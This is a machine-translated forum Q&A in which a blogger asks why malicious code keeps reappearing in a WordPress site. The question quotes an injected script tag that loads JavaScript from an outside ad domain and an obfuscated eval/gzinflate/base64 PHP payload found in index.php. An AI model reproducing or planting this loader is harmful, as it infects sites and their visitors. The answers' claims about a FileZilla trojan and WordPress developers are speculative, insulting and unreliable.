2012-10-26 20 views
1

最近(過去2周)這行代碼出現在WordPress博客的頁腳:在我的WordPress博客中指向linkstoads.net的鏈接,可能是病毒。我如何擺脫它?

<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script> 

我沒有把這裏。我不知道它的功能。但我想要它。

對於我的第一次嘗試,我剛剛更換模板,它已經走了幾分鐘。但它回來了。

,所以我就到我的index.php文件(沒有模板,第一個的index.php),並發現代碼:

#c3284d# 
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g=="))); 
#/c3284d# 

所以我刪除它,但它第二天又回來了。

這怎麼可能?我是病毒和安全的新手,所以答案可能非常基礎。

回答

0

問題解決了,wordpress不負責。

有能感染FileZilla的,當你打開它,它會在它可以通過FileZilla的到達每個頁面注入代碼木馬。

這真是一個大問題和3個防病毒軟件甚至無法找到它。

如果您看到這一點,請格式化您的計算機。

0

恭喜!你已經被黑客入侵!很可能你還沒有在一段時間內更新你的軟件,並且多個黑客利用了你軟件中的一些衆所周知的漏洞。

你如何解決它?焦土...你被許多機器人黑客入侵,並且可能像某種妓女在網上銷售。刪除你的整個web根目錄並從頭開始。確保你有每個插件和Wordpress的最新版本。

爲WordPress是寫的猴子或子女或子女的猴子記錄......不管它是迄今爲止我所見過砍死最差的應用之一。他們可能仍然在使用密碼散列作爲會話ID,這意味着他們甚至不理解爲什麼你應該散列密碼的基礎知識。

OAH如果你繼續遭到黑客攻擊,高的專業

+0

如果wordpress很爛,我應該採用哪個博客引擎? 我做了一個乾淨的安裝與更新後的版本,但如果這仍然是脆弱的...... – fabien

+0

@fabien軟​​件更新發布補丁的漏洞。 – rook

+0

是的,但你說它已經被孩子們的猴子編碼了......所以甚至可以用補丁...... :) – fabien